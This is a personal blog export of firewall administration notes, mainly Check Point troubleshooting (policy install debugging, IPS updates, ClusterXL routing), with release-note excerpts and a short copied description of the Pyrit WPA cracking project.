<span style="background-color: white; line-height: 13px;"><span style="color: #3d3d3d; font-family: Helvetica Neue, Helvetica, Arial, Lucida Grande, sans-serif; font-size: x-small;"><a href="https://community.rapid7.com/docs/DOC-1875">https://community.rapid7.com/docs/DOC-1875 </a></span></span>Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-33125162605877624372014-03-04T18:54:00.004+02:002014-03-04T18:54:19.668+02:00Debug Policy Install<div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Debugging a manual
policy pull from the enforcement point, and push from the SmartCenter, like so:</div>
<div style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div style="margin: 0in;">
<span style="font-family: Calibri;"><span style="font-size: 11pt;">f</span></span>w -d fetch <SmartCenter server IP address><br /></div>
<ul>
<li>fw -d fetchlocal -d $FWDIR/state/__tmp/FW1 &> <output file></li>
</ul>
<br />cpd.elg files from $CPDIR/log from the firewall<br /> <br /><br /><br />Push from the Smart Center to enforcement point;<br />
<div style="margin: 0in;">
<br />fwm -d load policy_name gateway_name 2> <filename>.txt </div>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-79578004600509682532014-03-04T13:44:00.002+02:002014-03-04T13:44:32.460+02:00Policy installation fails with "ERROR: function or table < pgm_len_block_code > undefined" and ".../conf/updates.def"<table border="0" cellpadding="0" cellspacing="0" class="unoverflowed-table" style="background-color: white; color: black; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12.800000190734863px; table-layout: fixed; width: 750pxpx; word-wrap: break-word;"><tbody>
<tr><td class="sc-pageTitleSub3Black" style="font-size: 13px; font-weight: bold; text-transform: uppercase;"><br /><br />SYMPTOMS</td></tr>
<tr><td><img height="10" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="100%" /></td></tr>
<tr><td class="sc-solutionSymptom" width="80%"><ul class="sc-solution" style="font-size: 12px; margin: 0px 0px 0px 15px; padding: 0px 0px 0px 3px;">
<li>After upgrading a Security Management to R76, policy installation in SmartDashboard fails with the following errors:<pre>"/opt/.../conf/updates.def", line <em>N</em>: ERROR: syntax error
"/opt/.../conf/<em><Policy_Name></em>.pf", line <em>N</em>: ERROR: function or table < pgm_len_block_code > undefined
"/opt/.../conf/<em><Policy_Name></em>.pf", line <em>N</em>: ERROR: syntax error
Compilation failed.
Operation ended with errors.
</pre>
</li>
<li>Debug of FWM daemon (per <a href="http://supportcontent.checkpoint.com/solutions?id=sk86186" style="color: #905690;" target="_blank">sk86186</a>) shows the same '<code style="font-family: 'Courier New', Courier, monospace;">ERROR: syntax error</code>'.<br /></li>
<li>Hotfix for IPv6 flavor issue from <a href="http://supportcontent.checkpoint.com/solutions?id=sk92933" style="color: #905690;" target="_blank">sk92933</a> does not help.</li>
</ul>
</td></tr>
<tr><td class="footnoteBold" style="font-size: 8pt; font-weight: bold;"><img height="25" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="100%" /></td></tr>
<tr><td class="sc-pageTitleSub3Black " style="font-size: 13px; font-weight: bold; text-transform: uppercase;">CAUSE</td></tr>
<tr><td><img height="10" src="https://sc1.checkpoint.com/sc/images/clear.gif" style="border: none;" width="100%" /></td></tr>
<tr><td class="sc-solutionCause" style="font-size: 12px;">IPS definitions are not up-to-date, or do not exist.<br />
<br />
<br />
<span style="font-size: 12.800000190734863px; font-weight: bold; text-transform: uppercase;">SOLUTION</span><br />
<span style="font-size: 12.800000190734863px; font-weight: bold; text-transform: uppercase;"><br /></span>
<span style="font-size: 12px;">Perform IPS Update in SmartDashboard.</span><br />
<span style="font-size: 12px;"><br /></span>
<span style="font-size: 12px;"><br /></span>
The issue occurred on R77 env. as well.<br />
<span style="font-size: 12px;"><br /></span>
<span style="font-size: 12px;"><br /></span></td></tr>
</tbody></table>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-68172935920827809922014-01-02T18:23:00.001+02:002014-01-02T18:24:30.986+02:00"du" //du -sh<div class="separator" style="clear: both; text-align: center;">
grand!</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuDzH5tgSMkP2JdNtMl7ewFoYsyQmSHvW0FbYsPCzNRsG2nkUQgqHPXLXG-dpBp06g78OIM-GrRcsH8GnMaQAURCxdraRj8HGxJAYJ5E6REiJeGUgsnerrUlULQzUuv0_frvueEb1PEo2R/s1600/du-sh.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuDzH5tgSMkP2JdNtMl7ewFoYsyQmSHvW0FbYsPCzNRsG2nkUQgqHPXLXG-dpBp06g78OIM-GrRcsH8GnMaQAURCxdraRj8HGxJAYJ5E6REiJeGUgsnerrUlULQzUuv0_frvueEb1PEo2R/s400/du-sh.PNG" width="400" /></a></div>
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-65844492293118585172013-09-11T02:29:00.004+03:002013-09-11T02:29:46.821+03:00Pyrit -WPA/WPA2-PSK Epic Fail-<div style="background-color: white; font-family: arial, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<strong><i>Pyrit</i></strong> allows to create massive databases, pre-computing part of the <a href="https://secure.wikimedia.org/wikipedia/en/wiki/Wi-Fi_Protected_Access" rel="nofollow" style="color: #0000cc;">IEEE 802.11 WPA/WPA2-PSK</a> authentication phase in a space-time-tradeoff. Exploiting the computational power of Many-Core- and other platforms through <a href="http://ati.amd.com/technology/streamcomputing/" rel="nofollow" style="color: #0000cc;">ATI-Stream</a>, <a href="http://www.nvidia.com/object/cuda_home.html" rel="nofollow" style="color: #0000cc;">Nvidia CUDA</a> and <a href="http://www.khronos.org/opencl/" rel="nofollow" style="color: #0000cc;">OpenCL</a>, it is currently by far the most powerful attack against one of the world's most used security-protocols.</div>
<div style="background-color: white; font-family: arial, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<br /></div>
<div style="background-color: white; font-family: arial, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
WPA/WPA2-PSK is a subset of <a href="https://secure.wikimedia.org/wikipedia/en/wiki/Wi-Fi_Protected_Access" rel="nofollow" style="color: #0000cc;">IEEE 802.11 WPA/WPA2</a> that skips the complex task of key distribution and client authentication by assigning every participating party the same <i>pre shared key</i>. This <i>master key</i> is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new <i>session key</i> is derived from the<i>master key</i> to encrypt and authenticate following traffic. The "shortcut" of using a single <i>master key</i> instead of <i>per-user keys</i> eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see <a href="http://pyrit.wordpress.com/the-twilight-of-wi-fi-protected-access/" rel="nofollow" style="color: #0000cc;">this article</a> on the project's <a href="http://pyrit.wordpress.com/" rel="nofollow" style="color: #0000cc;">blog</a>.</div>
<br />
<a href="https://code.google.com/p/pyrit/">https://code.google.com/p/pyrit/</a>Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-52955225281720623722013-09-02T22:29:00.001+03:002013-09-02T22:29:52.142+03:00R77 is now available!<h2 id="New" style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 14px; margin: 8px 0px; padding-top: 10px;">
<br />It seems to be the best one ever.</h2>
<h2 id="New" style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 14px; margin: 8px 0px; padding-top: 10px;">
<br /></h2>
<h2 id="New" style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 14px; margin: 8px 0px; padding-top: 10px;">
What's New in R77</h2>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
New Threat Emulation Software Blade</h3>
<div style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
The new Threat Emulation Software Blade blocks attacks which cannot be detected by signatures. It opens inspected files inside secure emulation environments to detect malicious behavior. It can be deployed as a cloud service or as a private (local) cloud.</div>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
New Check Point Compliance Blade</h3>
<div style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
This new Software Blade analyzes your environment for compliance with major regulations and international standards. Check Point Compliance Blade generates detailed reports, with best practice recommendations taken from the large Check Point library. Check Point Compliance Blade sends alerts for policy changes that can affect compliance.</div>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
HyperSPECT Technology</h3>
<div style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
Improvements to deep packet inspection engines boost performance for IPS and for Application and URL Filtering Software Blades Software Blades.</div>
<ul style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
<li>Supports SMT (Hyper-Threading)</li>
<li>Optimizations to DPI engines including streamers, parsers and pattern matching engines</li>
</ul>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
Gaia Operating System Enhancements</h3>
<ul style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
<li>Centrally manage basic network configuration</li>
<li>Back up and restore, run scripts, remote shell, and more, from a central console</li>
<li>Synchronize cluster members with Gaia OS configuration cloning</li>
</ul>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
Enhanced Gaia Software Updates</h3>
<div style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
Update the Gaia operating system with the enhanced <strong>Automated Software Updates</strong> tool:</div>
<ul style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
<li>Clean install of full image and upgrade of optimally sized package from the Check Point Cloud</li>
<li>Up to 90% less downtime for Security Gateway upgrade</li>
<li>Export and import of Gaia software update packages</li>
<li>New WebUI features with enhanced usability</li>
</ul>
<h3 style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 8px 0px;">
Enhanced Identity Awareness</h3>
<ul style="background-color: white; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 12px;">
<li>New identity acquisition method: RADIUS Accounting</li>
<li>Automatic update of LDAP group membership changes</li>
<li>Improved Identity Agent installation, with support for repair tools</li>
<li>New MSI configuration tool for Agent distribution</li>
</ul>
<br />
...<br />
<br />
a lot more at;<br />
<br />
<a href="https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk92965">https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk92965</a>Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-60415972356694776542013-08-29T16:46:00.003+03:002013-08-29T16:47:32.070+03:00Sending Syslog flow to an External Log Server<br />
Dear Checkpoint Fellows and Followers,<br />
<br />
Syslog data is possible to be sent as shown in sk33423, however only from physical boxes.<br />
<br />
If you have VSX infrastructure, it is not possible to send syslogs of each vsx customer to another syslog server. All and all..<br />
<br />
Sincerely.<br />
<br />
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-29593489563925966342013-08-29T16:41:00.003+03:002013-08-29T16:41:59.807+03:00Checkpoint R77<br />Very excited to test the new blades! :)Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-81429288597031822712013-08-02T11:31:00.001+03:002013-08-02T11:31:28.134+03:00Check Point R75.47 Released!<br />
<br />
<span style="color: #666666;">The </span><a href="http://supportcontent.checkpoint.com/documentation_download?ID=25460" style="background-color: white; border: 0px; color: #3170c9; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px; margin: 0px; outline: none 0px; padding: 0px; vertical-align: baseline;" target="_blank" title="Check Point R75.47 Release Notes">release notes</a><span style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;"> and the </span><a href="http://supportcontent.checkpoint.com/solutions?id=sk93450" style="background-color: white; border: 0px; color: #3170c9; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px; margin: 0px; outline: none 0px; padding: 0px; vertical-align: baseline;" target="_blank" title="Check Point R75.47 Resolves Issues">resolved issues</a><span style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;">, it’s mainly a maintenance or bug fix version.</span><br />
<br style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;" />
<span style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;">There are a lot of fixed bugs.</span><br />
<br style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;" />
<span style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;">It would be good to install the version firstly within the test environment, and then get it into production a.s.a.p.</span><br />
<span style="background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 15px; line-height: 25px;"><br /></span>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-10167560400316008112013-07-31T01:41:00.001+03:002013-07-31T01:41:06.515+03:00License Info Tool / Checkpoint<div class="separator" style="clear: both; text-align: left;">
License Tool for Checkpoint. I found it pretty useful actually as the license issues seem complicated most often. My Products > License Info Tool.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLzSxOf7dxgRlLsSGrvYDi8q_DTStvRlof1_YI3-FE2GGyNpTLrSZCrgjXcHK7spnrGVGc5TtXRgmhEppf_Apx99-O5EliubBLMzosXc7im-pmXbQjrjaPWDaADZQSkGk99Z7vj-D3HfkQ/s1600/license_CheckPoint.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLzSxOf7dxgRlLsSGrvYDi8q_DTStvRlof1_YI3-FE2GGyNpTLrSZCrgjXcHK7spnrGVGc5TtXRgmhEppf_Apx99-O5EliubBLMzosXc7im-pmXbQjrjaPWDaADZQSkGk99Z7vj-D3HfkQ/s400/license_CheckPoint.PNG" width="400" /></a></div>
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-86941964031617941632013-07-21T16:24:00.002+03:002013-07-21T16:26:29.704+03:00Fortinet Upgrade Procedures<br />
<br />
The upgrade processes have usually been a issue with Check Point. However, it is unbelievably easy for security vendor Fortinet (even in the cluster env.)<br />
<br />
- .out file is downloaded from the support site.<br />
- it is uploaded through GUI.<br />
<br />
then, all process goes on automatically; firstly the active member is upgraded with losing 4 - 6 ping packets, and then 2-3 ping lost while upgrading the second member.<br />
<br />
I suppose the reason is truly the architecture difference behind these boxes.<br />
<br />
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-22350161508283398422013-05-13T10:18:00.002+03:002013-06-24T13:07:00.502+03:00New Titles are Upcoming- Arbor<br />
- McAfee<br />
- FortinetEkin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-61778910679499740222013-02-22T14:40:00.001+02:002013-02-22T14:56:59.416+02:00Network Troubleshooting - Cisco Packet FlowTo be or not to be.<br />
Incoming or Outgoing Packets, sometimes understanding these two subjects are very vital in troubleshooting process.<br />
<br />
<br />
<div class="MsoNormal">
<span lang="EN-GB">ip
access-list extended gre-debug-out<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-GB">permit gre
any any log // optional <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-GB">permit ip
any any log<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-GB">ip
access-list extended gre-debug-in<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-GB">permit gre
any any log // optional<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-GB">permit ip
any any log<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-GB">interface
GigabitEthernet0/1<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-GB">ip
access-group gre-debug-in in<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-GB">ip
access-group gre-debug-out out<o:p></o:p></span><br />
<span lang="EN-GB"><br /></span>
<span lang="EN-GB"><br /></span>
<span lang="EN-GB">Here it is; </span><br />
<span lang="EN-GB"><br />show ip access-list gre-debug-in</span><br />
<span lang="EN-GB"><br /></span>
<span lang="EN-GB">show ip access-list gre-debug-out out</span><br />
<span lang="EN-GB"></span><br />
<pre style="background-color: white; font-size: 10px;">
</pre>
<pre style="background-color: white; font-size: 10px;">
</pre>
<span lang="EN-GB">believe me you will like the result..</span></div>
<div class="MsoNormal">
<span lang="EN-GB">:)</span></div>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-285333445142948992013-02-22T12:01:00.004+02:002013-02-22T12:01:52.862+02:00Identity Awareness - User & Machine IdentificationEven though you see users and/or machines as acquired in Smart Dashboard, pdp monitor is the place where AD query comes in. If you do not see users/machines in pdp monitor, It means that Check Point did not actually acquire the users/machines.<br />
<br />
pdp monitor all |more<br />
<br />
pdp monitor all |grep machine/username<br />
<br />
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-81213511320179192752013-02-15T13:39:00.003+02:002013-02-15T13:39:57.928+02:00IPS Update: ips scheduled update ended with errors<br />
<h3 class="post-title entry-title" itemprop="name" style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 22px; margin: 0px; position: relative;">
<br /></h3>
<div class="post-header" style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 1.6; margin: 0px 0px 1em;">
<div class="post-header-line-1">
</div>
</div>
<div class="post-body entry-content" id="post-body-5044976145879441173" itemprop="description articleBody" style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; position: relative; width: 586px;">
<br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUrvaygB1_-w86lU7ZvNDay-vhnMHFeM87oSjJVg0xlOFXAOWzNF_ekTbWKxHkE_eHD0UA1vRukwXjJs_ltKqkJlgmh96e0Xi5mKb8N0ssilnQiEBc8hOqL8oeQlucNiReEDtlNZSYO0pj/s1600/IPS.jpg" imageanchor="1" style="color: #4d469c; margin-left: 1em; margin-right: 1em; text-decoration: initial;"><img border="0" dba="true" height="114" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUrvaygB1_-w86lU7ZvNDay-vhnMHFeM87oSjJVg0xlOFXAOWzNF_ekTbWKxHkE_eHD0UA1vRukwXjJs_ltKqkJlgmh96e0Xi5mKb8N0ssilnQiEBc8hOqL8oeQlucNiReEDtlNZSYO0pj/s320/IPS.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; background-color: transparent; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Check the internet connection on SMC and Check dns config to see updates.checkpoint.com resolves to an IP.<br /><br />To manually update the IPS database;</div>
<div class="post-body entry-content" id="post-body-5044976145879441173" itemprop="description articleBody" style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; position: relative; width: 586px;">
<br />1- Close all GUI applications,<br />2- Open a GUIDBEdit to the SMC (Application:GuiDBedit.exe)<br />3- Search (Search->Find) for: autoupdate_and_install_status_obj</div>
<div class="post-body entry-content" id="post-body-5044976145879441173" itemprop="description articleBody" style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; position: relative; width: 586px;">
<br />Once found you will see a field named status under that object.<br /></div>
<div class="post-body entry-content" id="post-body-5044976145879441173" itemprop="description articleBody" style="background-color: white; color: #444444; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18px; position: relative; width: 586px;">
4- Change the value of status 0<br />5- Save changes,close GUIDBEDIT<br />6- Open Dashboard and verify if the issue resolved.<br /><br />Note : There is a fix for this issue, Request it from Support.</div>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-47415508819775199082013-02-13T15:52:00.002+02:002013-02-14T14:09:09.221+02:00ClusterXL - Do not Consume Public IPs for ClusterXL<br />
<i style="line-height: 19.5pt;"><span style="border: none windowtext 1.0pt; color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-border-alt: none windowtext 0cm; mso-fareast-language: TR; padding: 0cm;">Configuring Cluster Addresses on Different Subnets</span></i><br />
<div class="MsoNormal" style="line-height: 19.5pt; vertical-align: baseline;">
<i><span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;">
<span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">Only one routable IP address is required in a ClusterXL cluster,
for the virtual cluster interface that faces the Internet. All cluster member
physical IP addresses can be non-routable.Configuring different subnets for the
cluster IP addresses and the member addresses is useful in order to:</span></span></i></div>
<div class="MsoNormal" style="line-height: 19.5pt; vertical-align: baseline;">
<i><span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;"><br />
<span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">- Enable a multi-machine cluster to replace a single-machine
gateway in a pre-configured network, without the need to allocate new addresses
to the cluster members.</span><br />
<span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">- Allow organizations to use only one routable address for the
ClusterXL Gateway Cluster. This saves routable addresses.</span><o:p></o:p></span></i></div>
<div class="MsoNormal" style="line-height: 19.5pt; vertical-align: baseline;">
<img height="341" src="http://alpacapowered.files.wordpress.com/2012/08/clusterif.png" width="400" /></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;">ClusterXL
virtual IPs and your members physical (or VLAN) interfaces do not need to be on
the same subnet. So you can simply use whichever addresses you like for each of
the cluster interfaces (apart from internal/management and
external/VPN-routable interfaces obviously). And of course this applies to
physical untagged interfaces unlike our case too.<br />
I settled for using tiny Class B private space /30 subnets for each VLAN,
enough for just our 2 cluster members like this. The topology would then look
like this.<o:p></o:p></span><br />
<span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;"></span><br />
<a name='more'></a><span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;"><br /></span></div>
<div class="MsoNormal" style="background: white; line-height: 39.0pt; margin-bottom: 19.5pt; vertical-align: baseline;">
<b><span style="color: #323232; font-family: "Georgia","serif"; font-size: 13.5pt; mso-fareast-language: TR;">Beware of the spoofing
and routing<o:p></o:p></span></b></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;">Now here’s just 2 catc</span><span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt; line-height: 19.5pt;">hes with this
configuration. First off, anti-spoofing will apply to the members local
interface network and not the ClusterXL virtual one, so you can’t use the
comfortable </span><i style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt; line-height: 19.5pt;"><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">“Network defined by the interface IP and Net
Mask” </span></i><span style="color: #323232; font-family: Helvetica, sans-serif; font-size: 12pt; line-height: 19.5pt;">setting unless you want all your traffic dropped/detected
as spoofed. Instead just define a specific subnet object representing the
ClusterXL interface subnet.</span></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;">The second thing which shortly caused
some headache for me was that SPLAT/Gaia wouldn’t know where it needs to route
the public subnet. Now that the physical interfaces to those subnets had
different IPs, the OS naturally lacked the proper routing information and would
forward traffic through the default route.<br />
To solve this, I added static interface-based routes for each public subnet
like this. To my confusion however, they didn’t help and seemed to have no
effect. Checking the firewall nodes routing table via SSH confirmed that
there was no corresponding entry present.</span></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<img height="400" src="http://alpacapowered.files.wordpress.com/2012/08/interfaceroute.png" width="311" /></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;"></span><br />
<br /></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;">Instead I had to issue the following in
expert mode on the nodes to activate my routes:<br />
<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;"># route add -net 47.88.145.40/29 eth8.356</span></i><br />
The routing table would now look like this:<br />
<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;"># route -n</span></i><br />
<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">Kernel IP routing table</span></i><br />
<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">Destination
Gateway
Genmask Flags Metric
Ref Use Iface</span></i><br />
<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">172.31.255.16
0.0.0.0 255.255.255.252
U 0
0 0 eth8.356</span></i><br />
47.88.145.40<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">
0.0.0.0 255.255.255.248
U 0
0 0 eth8.356</span></i><o:p></o:p></span></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;">On the new Gaia CLI it looks like this:<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;"><br />
> show route</span></i><br />
<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">Codes: C – Connected, S – Static, R – RIP, B – BGP,</span></i><br />
<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;"> O – OSPF IntraArea (IA –
InterArea, E – External, N – NSSA)</span></i><br />
<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;"> A – Aggregate, K – Kernel
Remnant, H – Hidden, P – Suppressed</span></i><br />
<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">C 47.88.145.40/29
is directly connected, eth8.356</span></i><br />
<i><span style="border: none windowtext 1.0pt; mso-border-alt: none windowtext 0cm; padding: 0cm;">C 172.31.255.16/30 is
directly connected, eth8.356</span></i><br />
The route command in expert mode alone doesn’t survive a reboot, you still need
to set all routes in the Gaia/SPLAT CLI/Webinterface on all members. I
confirmed that the routes are being applied properly after a reboot. Also,
static routes using Gateway IPs do not need a reboot either, so this seems like
a bug specific to using interface-based routes.<o:p></o:p></span></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
<span style="color: #323232; font-family: "Helvetica","sans-serif"; font-size: 12.0pt; mso-fareast-language: TR;"><br /></span></div>
<div class="MsoNormal" style="background: white; line-height: 19.5pt; vertical-align: baseline;">
